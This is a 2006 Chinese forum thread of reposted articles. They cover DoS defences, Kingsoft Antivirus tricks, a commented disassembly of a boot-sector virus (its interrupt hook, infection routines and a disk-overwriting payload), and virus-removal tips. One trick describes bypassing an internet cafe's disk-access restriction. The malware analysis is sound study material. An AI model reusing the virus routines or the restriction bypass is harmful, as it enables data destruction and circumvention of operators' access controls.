尽管局域网管理员采取的措施在防止和抗击DoS攻击的基础工作中发挥着关键作用,但它们还必须在网络传输层实现某些完善的措施,以对基础工作进行有效补充。

保护网络数据流量

有效地保护网络数据流量涉及大量的互补战略,包括采用多层交换,实现独立于层的访问控制;利用可定制的过滤和“信任邻居”标准;控制非授权用户的网络登录访问。

独立于层的线速服务质量(QoS)和访问控制选项

带有可配置智能软件、独立于层的QoS和访问控制功能的线速多层交换系统的出现,大大改善了网络传输设施保护数据流量完整性的能力。

在基于传统路由器的网络设施中,认证机制如滤除带有内部地址的假冒分组,要求流量到达路由器边缘,并与特定访问控制列表中的标准相符。由于要维护访问控制列表,这一过程不仅耗时巨大,而且给整体路由器性能带来了重大开销。

相比之下,使用线速多层交换系统允许灵活实现各种基于策略的访问控制标准,它使用许多相同的机制,这些机制对在整个复杂网络设施中有效地实现QoS标准至关重要。

尽管这些多层交换系统在第二层执行线速交换功能,但它们能够从第一层到第四层及其它信源无缝地采用QoS和访问控制标准。

这种独立于层的访问控制能力实现了内置灵活性,把安全决策与网络结构决策完全分开,从而允许网络管理员有效地部署DoS预防措施,而不必采用次优的路由或交换拓扑。结果,网络管理员和服务供应商现在能够把整个城域网、数据中心或企业网环境中基于策略的控制标准无缝地集成起来,而不管其采用的是复杂的基于路由器的核心服务,还是相对简单的第二层交换本地环路。此外,线速处理标准查表和数据流量认证决策,可以在后台有效执行DoS应对措施,而很少或没有性能延迟。

可以定制的过滤和“信任邻居”机制

智能多层访问控制的另一优点是,它能够简便地实现定制过滤操作,如根据特定标准定制对系统响应的控制力度。通过这种方式,可以防止网络受到DoS攻击的影响,同时降低因疏忽丢弃合法流量的危险。独立于层的访问控制的另一个优点是,它能够定制路由访问策略,支持具体系统之间“信任邻居”关系,从而管理和优化系统间的数据流量。此外,多层交换技术提供了多种选项,可以防止未经授权使用内部路由策略,及防止潜在的破坏活动。

Extreme Networks(r)公司的Extreme Ware(tm)套装软件允许映射和覆盖IEEE802.1p和DiffServ标记,实现外部看不到的DiffServ功能。通过使用这些策略机制,系统管理员可以针对来自特定相邻系统的流量,调整内部路由控制策略,而不是在内部强制广播实际策略。

由于能够灵活地区分内部和外部DiffServ和IEEE802.1p标准,ExtremeWare为防止新一轮潜在DoS攻击(称为QoS攻击)提供了有效的工具。

Extreme Ware能够维护不可视的内部DiffServ处理策略,使得所有Extreme交换机都能够简便地忽略、观察或处理从可能“不信任的邻居”收到的任何DiffServ标记。

定制网络登录配置操作

网络登录机制的采用在减少DoS攻击漏洞中发挥着关键作用。网络登录采用惟一的用户名和口令,在用户获准进入或传送分组流量前认证用户身份,从而防止认证前发生DoS攻击的危险。

通过利用DHCP模拟拨号技术采用PPP的方式,网络登录可以终止网络边缘的非法访问,减轻给网络设施带来的任何消极影响。

Extreme Networks公司的技术团队成员参与编写了IEEE802.1草案,通过利用其中包含的规范中已有的标准,这些网络登录机制可以控制用户对交换机的访问,最大限度地降低直接DoS攻击的危险。同时,网络登录为管理和跟踪企业或服务供应商网络内部的用户连接和交易提供了一种强健的机制。

保护网络基础设施

除保护网络数据流量外,防止网络基础设施受到DoS攻击、确保可靠性和容错能力也同样重要。保护基础设施的关键是维护独立的访问列表,紧密管理转发控制和负载均衡功能,及进行严格的设计测试,以确保系统容错能力。
作者: 语苛经历    时间: 2006-10-23 21:15


金山毒霸6的三大另类用法

金山毒霸6的主要功能是杀病毒,除此以外它还有其他妙用,而且功能还很不简单呢!下面就让我们一起来体验一下金山毒霸6带给我们的惊喜。

一、恢复EXE文件关联
如果木马、病毒或误操作破坏了EXE文件的正常关联,则会导致本机中所有EXE文件无法运行。其实用金山毒霸6能很快恢复EXE文件关联。

进入金山毒霸6的安装目录,找到金山毒霸6的主程序kav32.EXE文件,把它改名为kav32.com,然后运行kav32.com,这样金山毒霸6的主程序就被启动了。关闭该文件,再把kav32.com改名为kav32.EXE,再运行任何EXE文件试试,结果都可以运行了。因为金山毒霸6每次启动时都会自动检查注册表中的EXE关联是否正确,如果不是系统的默认值就会自动恢复。因此只要将kav32.EXE改名为kav32.com文件运行一次,金山毒霸就会帮我们自动恢复EXE文件关联,而我们正是巧妙地利用了这一点。

注意:金山毒霸6提供的金山毒霸IE修复器也具有恢复EXE文件关联的功能。

二、解锁注册表
到金山毒霸6的安装目录下,找到金山毒霸6病毒防火墙KWatchUI.EXE文件,把它改名为1.exe,然后到Windows所在目录下把注册表编辑器的Regedit.exe这个文件拷贝到金山毒霸6所在文件夹下,并改名为KWatchUI.EXE。运行金山毒霸6,在程序的主界面中选择“工具”菜单下的“金山毒霸病毒防火墙”,启动运行的正是我们需要的注册表编辑器。赶快展开注册表到“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System”主键,在右边窗口中找到DWORD值“Disableregistrytools”,把它的键值改为“0”就可以给注册表解锁了。

三、突破网吧中对硬盘访问的限制
网吧为了方便管理,常使用软件限制我们访问本地硬盘。现在我们要利用金山毒霸6来突破这个限制。
打开金山毒霸,在运行窗口单击“帮助”→“联机帮助”,会出现帮助窗口,在该窗口中用鼠标右键点击标题栏,在弹出菜单中选择“跳至URL?J?...”,会出现如图所示对话框 ,在该窗口的“跳至该URL?J?”栏中输入file?//C?/,点击“确定”按钮就可以进入C盘。同样的方法,把C改成其他盘符或路径,我们就可以访问这些盘了。
[此贴子已经被作者于2006-10-23 21:17:41编辑过]

作者: 语苛经历    时间: 2006-10-23 21:19



作者: 语苛经历    时间: 2006-10-23 21:21
一、带毒环境下检测清除病毒的意义

??目前在我国流行的病毒一般可分为引导型病毒 、文件型病毒和混合型病毒 。引导型病毒的特点是它寄生在软盘的DOS引导扇区和硬盘的主引导记录或DOS引导区中 ,开机时由计算机自动读入内存中执行文件型病毒则将自身附加在可执行文件上 ,在执行被感染程序时,病毒首先获得控制权,进行驻留或破坏等活动。混合型病毒既能感染引导区也能感染可执行文件,具有更强的传染性。常用的杀毒软件有瑞星2004、金山毒霸、KV300 、公安部的KILL 、美国McAfee公司的SCAN和CLEAN等 ,这些软件各有自身的优点。但是在一个带毒的环境下,也即在病毒已经驻留在内存中的情况下,这些杀毒软件都存在不足并可能带来一些不良的后果。
??
??当系统感染一种已知病毒时,KILL和SCAN 发现内存中有病毒后,一般是拒绝继续执行,并要求用干净的盘重新启动。KV300发现类似的警告信息,但提供给用户一个选择的机会,以确定是否继续执行, 很显然 ,若用户选择继续 ,所带来的后果是不可预期的。
??
??当系统感染一种未知病毒时,三种软件在未发现内存中有已知病毒后,都假设系统中无病毒,忠实地执行检测或清除功能。事实上,这个未知病毒可能会在检测时传染盘中所有的可执行文件。

??由上面的讨论可知,清查病毒时只有从绝对干净的盘启动,而且要求杀毒软件自身无毒,才能够保证万无一失。然而,由于人们相互拷贝各种软件,很大程度上帮助了病毒的传播,在许多情况下, 要获得一张干净的启动盘很不容易,并且对于一些对计算机系统了解不是很多的使用者来说,他们根本 无法断定一张启动盘是不是干净的。因此,探讨在带毒环境下进行病毒检测和清除的方法是很有意义的 。
??
?? 二 、带毒环境下检测清除病毒的原理
??
??对于一个驻留内存伺机进行传染和破坏的病毒来说,一般都要截取某些中断向量,当其他程序调用这些中断时,病毒重新取得控制权,判断是否满足特定的条件,满足则激活传染或破坏部分,在条件不满足的情况下一般是调用原中断服务程序,实现正常的系统功能。

??引导型病毒常接管INT13H、08H、10H等中断;文件型病毒则常接管INT21H、24H、25H、26H、1CH 、13H、10H等中断。

举一个例子: 该例子转自黑白网络"一个主引导区病毒的分析 作者:sinister

病毒体:
JMP 01AF ;JMP到01AF
DB 00 ;病毒标计
DW 00F5 ;此为搬到高位址后,远程跳转指令
DW 9F80 ;目的地,也就是跳下一个指令XOR AX,AX
DB 02
DW 0003 ;此为软盘识别标记,硬盘为0007
DW EC59 ;
DW F000 ;INT 13H的原入口
.
.
.
.
.
XOR AX,AX ;清除AX
MOV DS,AX; ;让DS=0000
CLI ;清I标志积存器
MOV SS,AX ;把堆栈设为0000:7C00也就是开机
MOV AX,7C00 ;后载入引导分区表的地址,目前地址
MOV SP,AX ;开机时为0000:7CB6
STI ;设I标志积存器
PUSH DS ;把DS=0000,AX=7C00压栈,留给0B33:024A
PUSH AX ;用RETF,把程序转到引导或分区表位置
MOV AX,[004C] ;取中断向量表中,INT 13H的偏移位置
MOV [7C0A],AX ;保存INT 13H的偏移位置,也就是存在
MOV AX,[004E] ;取INT 13H的段地址
MOV [7C0C],AX ;存到010C

;以上是HOOK系统读写盘调用INT 13用病毒体替代原INT 13
;读写以便传播发作


MOV AX,[0413] ;取得内存K数,放在AX
DEC AX ;
DEC AX ;减2k内存
MOV [0413],AX ;存回,通常是638K
MOV CL,06 ;
SHL AX,CL ;
MOV ES,AX ;算出减2K后病毒本体的位址
MOV [7C05],AX ;AX存入0105


;病毒常用手法将系统高段内存减少以便驻留
;这样可以免于被其他程序覆盖


MOV AX,000E ;病毒拦INT 13H
;ISR起始的偏移量
MOV [004C],AX ;
MOV [004E],ES ;设原为病毒的INT 13H
MOV CX,01BE ;病毒长度为1BE
MOV SI,7C00 ;从JMP 01AF开始
XOR DI,DI ;DI=0
CLD ;清方向标志
REPZ;
MOVSB ;CX=1BE,将病毒自身搬移到高位址,目地是使其引导或
CS: ;分区表能载入0000:7C00正常运作
JMP FAR [7C03] ;跳到为搬过后的位址
XOR AX,AX ;清AX
MOV ES,AX ;ES=0000
INT 13 ;复位磁盘
PUSH CS ;
POP DS ;让DS=CS
MOV AX,0201 ;用INT 13H读一扇区,是引导,或分区表则

MOV BX,7C00 ;读到0000:7C00
MOV CX,[0008] ;硬盘第0道,第7扇区
CMP CX,+07 ;比较是否从硬盘启动
JNZ 0213 ;不是跳0213
MOV DX,0080 ;第一硬盘C:第零面
INT 13 ;用INT 13号中断,读
JMP 023E ;跳023E比较日期,发作或正常开机
MOV CX,[0008] ;软盘0道,第3扇区
MOV DX,0100 ;A:的第0面
INT 13 ;INT 13读盘
JB 023E ;失败跳023E
PUSH CS
POPES ;让ES=CS
MOV AX,0201 ;
MOV BX,0200 ;
MOV CX,0001 ;
MOV DX,0080 ;
INT 13 ;读入C:的分区表到0200,以便下面比较
JB 023E ;失败跳023E
XOR SI,SI ;清SI
CLD ;清方向标志以便比较
LODSW ;载入一个WORD到AX
CMP AX,[BX] ;比较有无病毒存在..E9AC
JNZ 0287 ;没有则跳0287传染
LODSW ;载入一个WORD到AX
CMP AX,[BX+02] ;再次确认..0000
JNZ 0287 ;没有跳0287
XOR CX,CX ;清CX
MOV AH,04 ;
INT 1A ;取得日期
CMP DX,0306 ;是否为三月六日
JZ 024B ;是跳024B传染
RETF ;把程序交还给引导启动完成


步骤4:病毒INT 13代码分析
方法:U

PUSH DS ;首先把要用到积存器
PUSH AX ;入栈保存
OR DL,DL ;比较是否为软盘
JNZ 002F ;如不是则退出传染
XOR AX,AX ;AX=0
MOV DS,AX ;数据代段=0
TEST BYTE PTR [043F],01 ;比较是否为A盘
JNZ 002F ;不是则退出
POP AX ;将以上保存积存器
POP DS ;弹栈恢复
PUSHF ;压栈标志积存器
CS: ;以便执行原INT 13
CALL FAR [000A] ;执行原INT 13
PUSHF ;再次压栈
CALL 0036 ;以便跳转到传染程序
POPF ;跳转到执行传染
RETF 0002 ;结束中断调用返回
POP AX ;恢复
POP DS ;堆栈
CS: ;跳转到原正常INT 13
JMP FAR [000A] ;地址执行


;此段代码中展现了病毒常用手法,利用标志积存器做跳转


步骤5:传染过程分析
方法:U

对软盘传染过程:

PUSH AX ;工
PUSH BX ;作
PUSH CX ;寄
PUSH DX ;存
PUSH DS ;器
PUSH ES ;入
PUSH SI ;栈
PUSH DI ;保存
PUSH CS ;以压/弹栈方式
POP DS ;使数据段DS和
PUSH CS ;附加段ES均指向
POP ES ;代码段CS
MOV SI,0004 ;试4次
MOV AX,0201 ;设置各
MOV BX,0200 ;积存器
MOV CX,0001 ;为读软盘
XOR DX,DX ;引导扇区做准备
PUSHF ;压栈标志积存器
CALL FAR [000A] ;正常的INT 13调用
JNB 0063 ;成功则转判断
XOR AX,AX ;不成功复位
PUSHF ;磁盘继续读
CALL FAR [000A] ;如果4次
DEC SI ;均匀不成功
JNZ 0045 ;则退出跳转
JMP 00A6 ;退出传染
XOR SI,SI ;SI=0以便用
CLD ;LODSW读入软盘
LODSW ;第1或第2字进行比较
CMP AX,[BX] ;比较如果不包含病毒标志
JNZ 0071 ;则跳转写传染
LODSW ;如果已有标志
CMP AX,[BX+02] ;则退出
JZ 00A6 ;传染子程序
MOV AX,0301 ;为写盘准备
MOV DH,01 ;如果是360K
MOV CL,03 ;则写到1面0道3扇区
CMP BYTE PTR [BX+15],FD ;比较软盘
JZ 0080 ;如果大于360K
MOV CL,0E ;写到1面0道14扇区
MOV [0008],CX ;写病毒标志到软盘
PUSHF ;调用原INT 13
CALL FAR [000A] ;进行传染
JB 00A6
MOV SI,03BE ;以下是将正常
MOV DI,01BE ;引导扇区从
MOV CX,0021 ;1BE起的21字节内容
CLD ;搬移到病毒程序尾部
REPZ ;开始复制
MOVSW
MOV AX,0301 ;写盘功能调用,写一个扇区
XOR BX,BX ;将病毒程序
MOV CX,0001 ;写入软盘引导扇区内
XOR DX,DX ;设置为软盘
PUSHF
CALL FAR [000A] ;执行正常INT 13调用写盘
POP DI ;将
POP SI ;工
POP ES ;作
POP DS ;寄
POP DX ;存
POP CX ;器
POP BX ;退
POP AX ;栈
RET ;返回调用处

对硬盘传染过程:

MOV CX,0007 ;第7扇区
MOV [0008],CX ;此处为硬盘引导标记
MOV AX,301 ;写功能调用
MOV DX,0080 ;设置为硬盘
INT 13 ;将正常引导扇区写到0面0道7扇区内
JB 13E ;失败则转
MOV SI,03BE ;原分区表地址
MOV DI,01BE ;目标地址
MOV CX,0021 ;整个分区表
REPNZ
MOVSW ;开始复制

;此段代码是将硬盘分区信息,搬移到病毒程序尾部
;这样在分析着查看硬盘分区信息时仍能看到该部分
;内容,以次来麻痹分析者

MOV AX,0301 ;准备写病毒提进硬盘
XOR BX,BX ;病毒体位置
INC CL ;第一扇区
INT 13 ;开始写盘传染
JMP 013E ;转到13E处判断是否为3月6日,是则发作


步骤6:破坏过程分析
方法:U

主要分析对硬盘数据破坏:

.
.
.
.
.
MOV DL,80
MOV BYTE PTR[0007],04

;准备写硬盘
MOV AL,11 ;写17个扇区
MOV BX,5000
MOV ES,BX ;从内存ES:5000中处开始写
INT 13 ;残不人睹
JNB 0179 ;成功转179继续写
XOR AH,AH
INT 13 ;不成功复位磁盘继续
INC DH ;使写操作磁头加1继续?
CMP DH,[0007] ;比较是否小于0007单元值
JB 0150 ;是则返回开始处继续写
XOR DH,DH ;DH=0
INC CH ;再加扇区
JMP 0150 ;反回继续写

;以上操作实际上是对硬盘执行4次写操作,每次17个扇区
;共68个扇区,这样就完全破坏了盘中的引导扇区,根目录
;和文件分配表。


引导扇区病毒,俺手里没有,这是一段DOS BOOT的分析。BOOT区病毒和他完成同样的工作,只不过每次
读盘的时将自身写入磁盘。

引导过程如下:
1>调整堆栈位置
2>修改并用修改后的磁盘参数表来复位磁盘系统
3>计算根目录表的首扇区的位置及IO.SYS的扇区位置
4>读入根目录表的首扇区
5>检查根目录表的开头两项是否为IO.SYS及MSDOS.SYS
6>将IO.SYS文件开头三个扇区读入内存0000:0700H处
7>跳到0000:0700H处执行IO.SYS,引导完毕

003E FA CLI
003F 33C0 XOR AX,AX
0041 8ED0 MOV SS,AX
0041 8ED0 MOV SS,AX
0043 BC007C MOV SP,7C00 ; 初始化堆栈
0046 16 PUSH SS
0047 07 POP ES ;(ES)=0000H
0048 BB7800 MOV BX,0078 ;1EH 号中断向量的地址为0000:0078H
004B 36 SS: ;(SS)=0000H
004C C537 LDS SI,[BX] ;取1EH号中断向量的内容存入DS:SI
004E 1E PUSH DS ;该中断向量指向一个11字节的磁盘参数表
004F 56 PUSH SI ;取到后压入堆栈中保存
0050 16 PUSH SS
0051 53 PUSH BX ;保存地址0000:0078H
0052 BF3E7C MOV DI,7C3E ;7C3E-7C00=003EH,即偏移003EH,以下类推
0055 B90B00 MOV CX,000B ;磁盘参数表共11字节
0058 FC CLD
0059 F3 REPZ
005A A4 MOVSB ;将磁盘参数表复制到0000:7C3EH处
005B 06 PUSH ES
005C 1F POP DS ;(DS)=0000H
005D C645FE0F MOV BYTE PTR [DI-02],0F ;修改参数表中"磁头定位时间"
0061 8B0E187C MOV CX,[7C18] ;从BPB中取"每磁道扇区数"
0065 884DF9 MOV [DI-07],CL ;修改参数表中"每磁道扇区数"
0068 894702 MOV [BX+02],AX ;(AX)=0000H,修改1EH号中断向量(段址)
006B C7073E7C MOV WORD PTR [BX],7C3E ;修改1EH号中断向量(偏移),这样1EH号
006F FB STI ;中断向量的内容为0000:7C3EH,指向新的磁盘参数表
0070 CD13 INT 13 ;用新的磁盘参数表来复位磁盘
0072 7279 JB 00ED ;出错则转出错处理


; 下面一段程序计算扇区位置
0074 33C0 XOR AX,AX
0076 3906137C CMP [7C13],AX ;偏移0013H处是Dos分区的总扇区数
007A 7408 JZ 0084 ;为零表示大硬盘?
007C 8B0E137C MOV CX,[7C13] ;不为0则取出来放到偏移0020H处
0080 890E207C MOV [7C20],CX ;这个值本程序未用,似乎为IO.SYS准备的
0084 A0107C MOV AL,[7C10] ;取FAT表的个数
0087 F726167C MUL WORD PTR [7C16] ;乘以一个FAT表所占的扇区数
008B 03061C7C ADD AX,[7C1C] ;加上Dos分区前的扇区数(隐藏扇数,低位)
008F 13161E7C ADC DX,[7C1E] ; 高位
0093 03060E7C ADD AX,[7C0E] ;加上Dos分区内的保留扇区数(低位)
0097 83D200 ADC DX,+00 ; (高位)
009A A3507C MOV [7C50],AX ;根目录表的首扇的逻辑扇区号(低位)
009D 8916527C MOV [7C52],DX ; (高位)
00A1 A3497C MOV [7C49],AX ;此处放IO.SYS的首扇的逻辑扇区号(低位)
00A4 89164B7C MOV [7C4B],DX ; (高位)
00A8 B82000 MOV AX,0020 ;根目录表中每项占32字节
00AB F726117C MUL WORD PTR [7C11] ;乘以根目录表中的项数
00AF 8B1E0B7C MOV BX,[7C0B] ;取"每扇区的字节数"
00B3 03C3 ADD AX,BX ;这两条指令是为了取整
00B5 48 DEC AX
00B6 F7F3 DIV BX ;除以每扇字节数,得到根目录所占扇区数
00B8 0106497C ADD [7C49],AX ;得到根目录表后首扇的逻辑扇区号(低位)
00BC 83164B7C00 ADC WORD PTR [7C4B],+00 ; (高位)

;下面一段程序在根目录表中找系统文件IO.SYS和MSDOS.SYS
00C1 BB0005 MOV BX,0500 ;内存缓冲区的偏移值
00C4 8B16527C MOV DX,[7C52] ;取根目录表的首扇的逻辑扇区号(高位)
00C8 A1507C MOV AX,[7C50] ; (低位)
00CB E89200 CALL 0160 ;将逻辑扇区号转换为物理扇区号
00CE 721D JB 00ED ;出错则转出错处理
00D0 B001 MOV AL,01
00D2 E8AC00 CALL 0181 ;读一个扇区到内存(根目录的首扇)
00D5 7216 JB 00ED ;出错处理
00D7 8BFB MOV DI,BX ;内存缓冲区的首址
00D9 B90B00 MOV CX,000B ;比较11个字节
00DC BEE67D MOV SI,7DE6 ;偏移01E6处是串"IO SYS",长11字节
00DF F3 REPZ
00E0 A6 CMPSB ;看第一项是否为IO.SYS
00E1 750A JNZ 00ED ;不是则出错
00E3 8D7F20 LEA DI,[BX+20] ;跳过32字节就指向第二项
00E6 B90B00 MOV CX,000B ;比较11个字节
00E9 F3 REPZ
00EA A6 CMPSB ;看第二项是否为MSDOS.SYS
00EB 7418 JZ 0105 ;是则两个文件都已找到,跳过出错处理


;下面一段进行出错处理
00ED BE9E7D MOV SI,7D9E ;偏移019EH处是串"Non system disk..."
00F0 E85F00 CALL 0152 ;显示字符串
00F3 33C0 XOR AX,AX
00F5 CD16 INT 16 ;等待任一键按下
00F7 5E POP SI
00F8 1F POP DS ;得到1EH号中断向量的地址0000:0078H
00F9 8F04 POP [SI]
00FB 8F4402 POP [SI+02] ;恢复1EH号中断向量的内容
00FE CD19 INT 19 ;自举
0100 58 POP AX
0101 58 POP AX
0102 58 POP AX ;清理堆栈
0103 EBE8 JMP 00ED ;再次试图起动


;下面读入IO.SYS的头3个扇区到内存0000:0700H处
0105 8B471A MOV AX,[BX+1A] ;从根目录表第一项中取IO.SYS的首簇号
0108 48 DEC AX
0109 48 DEC AX ;首簇号减二
010A 8A1E0D7C MOV BL,[7C0D] ;取每簇的扇区数
010E 32FF XOR BH,BH
0110 F7E3 MUL BX ;(首簇号 - 2)乘以 每簇的扇区数
0112 0306497C ADD AX,[7C49] ;相加后得到IO.SYS的首扇的逻辑扇区号
0116 13164B7C ADC DX,[7C4B]
011A BB0007 MOV BX,0700 ;内存缓冲区的偏移值
011D B90300 MOV CX,0003 ;循环计数初值,读3个扇区
0120 50 PUSH AX ;逻辑扇区号进栈(低位)
0121 52 PUSH DX ; (高位)
0122 51 PUSH CX ;循环计数器进栈
0123 E83A00 CALL 0160 ;逻辑扇区号转换为物理扇区号
0126 72D8 JB 0100 ;出错处理
0128 B001 MOV AL,01
012A E85400 CALL 0181 ;读一个扇区到内存缓冲区
012D 59 POP CX ;循环计数出栈
012E 5A POP DX
012F 58 POP AX ;逻辑扇区号出栈
0130 72BB JB 00ED ;读盘出错处理
0132 050100 ADD AX,0001
0135 83D200 ADC DX,+00 ;下一个扇区
0138 031E0B7C ADD BX,[7C0B] ;缓冲区指针移动一个扇区的大小
013C E2E2 LOOP 0120 ;循环读入三个扇区
013E 8A2E157C MOV CH,[7C15] ;取"磁盘介质描述",传给IO.SYS
0142 8A16247C MOV DL,[7C24] ;取"系统文件所在的驱动器号"
0146 8B1E497C MOV BX,[7C49] ;取IO.SYS的首扇的逻辑扇区号
014A A14B7C MOV AX,[7C4B]
014D EA00007000 JMP 0070:0000 ;执行IO.SYS,引导完毕

;显示字符串的子程序
0152 AC LODSB ;从串中取一个字符
0153 0AC0 OR AL,AL
0155 7429 JZ 0180 ;为0则已到串尾,返回(共用RET指令)
0157 B40E MOV AH,0E
0159 BB0700 MOV BX,0007
015C CD10 INT 10 ;显示该字符
015E EBF2 JMP 0152 ;循环显示下一个

;将逻辑扇区号转换为物理扇区号的子程序
0160 3B16187C CMP DX,[7C18] ;这两条指令是为了避免第二次除法时除数
0164 7319 JNB 017F ;为0
0166 F736187C DIV WORD PTR [7C18] ;逻辑扇取号除以每道扇区数,商(AX)=总磁
016A FEC2 INC DL ;道数,余数(DX)再加一即为扇区号,因为扇
016C 88164F7C MOV [7C4F],DL ;区号是从1开始的,而不是从0开始
0170 33D2 XOR DX,DX
0172 F7361A7C DIV WORD PTR [7C1A] ;总磁道数(AX)再除以面数,所得的
0176 8816257C MOV [7C25],DL ;余数(DX)=面号(即磁头号)
017A A34D7C MOV [7C4D],AX ;商(AX)=磁道号
017D F8 CLC
017E C3 RET ;正常返回
017F F9 STC
0180 C3 RET ;异常返回

;读一个扇区的子程序
0181 B402 MOV AH,02 ;读功能调用
0183 8B164D7C MOV DX,[7C4D] ;需要的入口参数如下:
0187 B106 MOV CL,06 ;(DL)=驱动器号
0189 D2E6 SHL DH,CL ;(DH)=面号
018B 0A364F7C OR DH,[7C4F] ;(CH)=磁道号
018F 8BCA MOV CX,DX ;(CL)=扇区号(第6,7位为磁道号的高2位)
0191 86E9 XCHG CH,CL ;(AL)=要读的扇区数
0193 8A16247C MOV DL,[7C24] ;(ES:BX)=缓冲区首址
0197 8A36257C MOV DH,[7C25]
019B CD13 INT 13
019D C3 RET
9x下的主引导/引导扇区没大区别,为了识别大分区用了一个INT 13的扩展调用42H。

??
??既然病毒是通过接管中断来获取传染和破坏的机会,那么我们是否有办法找回被病毒接管的中断 服务程序的地址,从而杀毒软件可以直接调用原中断,避免激活病毒? 笔者认为这是可能的,因为病毒在接管中断后,一般只对读写操作 、文件操作和执行等子功能调用感兴趣,对于其他一些功能调用,病毒只是简单地调用原中断服务程序进行处理,并通常使用下列指令进行调用:

?? jmp xxxx:xxxx
?? call xxxx:xxxx
jmp far ptr cs:[xxxx]
call far ptr cs:[xxxx]
??
??以INT21H为例,我们可以调用取DOS版本号的子功能3306H,对整个调用过程进行单步跟踪,并假设病毒驻留的段地址与INT21H原中断段地址是不同的,如果调用过程中CS发生改变,我们把每次CS改变后 执行的第一条指令的地址都记录下来,那么INT21H原来的中断地址也必定在其中。
??
??但记录的地址不止一个,究竟哪个是我们所要找的呢?这里我们可以假设病毒在调原中断服务程序时把各个寄存器(指AX、BX、CX、DX 、SI、DI、DS、ES)都设置成我们调用时所设置的值,同时真正的中断服务程序返回时又会改变寄存器的值,这个假设在绝大多数情况下都是正确的,从该假设出发,只需在各个寄存器值有改变的情况下,记录下每次CS改变后的第一条指令的地址,那么在中断返回后,记录中的最近一个地址就是所需找的原中断地址。需要指出的是,如果内存中还有其他驻留程序也接管了INT21H所找到的地址同样绕过了这些驻留程序。

作者: 语苛经历    时间: 2006-10-23 21:21
发现病毒,但是无论在安全模式还是Windows下都无法清除怎么办?


由于某些目录和文件的特殊性,无法直接清除(包括安全模式下杀毒等一些方式杀毒),而需要某些特殊手段清除的带毒文件。以下所说的目录均包含其下面的子目录。

1、带毒文件在\Temporary Internet Files目录下。

由于这个目录下的文件,Windows会对此有一定的保护作用(未经证实)。所以对这个目录下的带毒文件即使在安全模式下也不能进行清除,对于这种情况,请先关闭其他一些程序软件,然后打开IE,选择IE工具栏中的"工具"\"Internet选项",选择"删除文件"删除即可,如果有提示"删除所有脱机内容",也请选上一并删除。

2、带毒文件在\_Restore目录下,或者System Volume Information目录下。

这是系统还原存放还原文件的目录,只有在装了Windows Me/XP操作系统上才会有这个目录,由于系统对这个目录有保护作用。对于这种情况需要先取消"系统还原"功能,然后将带毒文件删除,甚至将整个目录删除也是可以的。 关闭系统还原方法。WindowsMe的话,禁用系统还原,DOS下删除。具体请参考下文:
http://community.rising.com.cn/Forum/msg_read.asp?FmID=33&SubjectID=2028691&page=1。XP关闭系统还原的方法:右键单击“我的电脑”,选“属性”——“系统还原”——在“在所有驱动器上关闭系统还原”前面打勾——按“确定”退出。

3、带毒文件在.rar、.zip、.cab等压缩文件中。

现今能支持直接查杀压缩文件中带毒文件的反病毒软件还很少,即使有也只能支持常用的一些压缩格式;所以,对于绝大多数的反病毒软件来说,最多只能检查出压缩文件中的带毒文件,而不能直接清除。而且有些加密了的压缩文件就更不可能直接清除了。

要清除压缩文件中的病毒,建议解压缩后清除,或者借助压缩工具软件的外挂杀毒程序的功能,对带毒的压缩文件进行杀毒。

4、病毒在引导区或者SUHDLOG.DAT或SUHDLOG.BAK文件中。

这种病毒一般是引导区病毒,报告的病毒名称一般带有boot、wyx等字样。如果病毒只是存在于移动存储设备(如软盘、闪存盘、移动硬盘)上,就可以借助本地硬盘上的反病毒软件直接进行查杀;如果这种病毒是在硬盘上,则需要用干净的可引导盘启动进行查杀。

对于这类病毒建议用干净软盘启动进行查杀,不过在查杀之前一定要备份原来的引导区,特别是原来装有别的操作系统的情况,如日文Windows、Linux等。

如果没有干净的可引导盘,则可使用下面的方法进行应急杀毒:
(1) 在别的计算机上做一张干净的可引导盘,此引导盘可以在Windows 95/98/ME系统上通过"添加/删除程序"进行制作,但要注意的是,制作软盘的操作系统须和自己所使用的操作系统相同;
(2) 用这张软盘引导启动带毒的计算机,然后运行以下命令:
A:\>fdisk/mbr
A:\>sys a: c:
如果带毒的文件是在SUHDLOG.DAT或SUHDLOG.BAK文件中,那么直接删除即可。这是系统在安装的时候对硬盘引导区做的一个备份文件,一般作用不大,病毒在其中已经不起作用了。

5、带毒文件的后缀名是.vir、.kav、.kbk等。

这些文件一般是一些防毒软件对原来带毒的文件做的备份文件,一般情况下,如果确认这些文件已经无用了,那就将这些文件删除即可。

6、带毒文件在一些邮件文件中,如dbx、eml、box等。

有些防毒软件可以直接检查这些邮件文件中的文件是否带毒,但往往不能对这些带毒的文件直接的进行操作,对于一些邮箱中的带毒的信件,可以根据防毒软件提供的信息找到那带毒的信件,删除信件中的附件或者删除该信件;如果是eml、nws一些信件文件带毒,可以用相关的邮件软件打开,确认该信件及其附件,然后删除相关内容。一般有大量的eml、nws的带毒文件的话,都是病毒自动生成的文件,建议都直接删除。

7、文件中有病毒的残留代码。

这种情况比较多见的就是带有CIH、Funlove、宏病毒(包括Word、Excel、Powerpoint和Wordpro等文档中的宏病毒)和个别网页病毒的残留代码,通常防毒软件对这些带有病毒残留代码的文件报告的病毒名称后缀通常是int、app等结尾,而且并不常见,如W32/FunLove.app、W32.Funlove.int。一般情况下,这些残留的代码不会影响正常程序的运行,也不会传染,如果需要彻底清除的话,要根据各个病毒的实际情况进行清除。

8、文件错误。

这种情况出现的并不多,通常是某些防毒软件将原来带毒的文件并没有很干净地清除病毒,也没有很好的修复文件,造成文件无法正常使用,同时造成别的防毒软件的误报。这些文件可以直接删除。

9、加密的文件或目录。

对于一些加密了的文件或目录,请在解密后再进行病毒查杀。

10、共享目录。

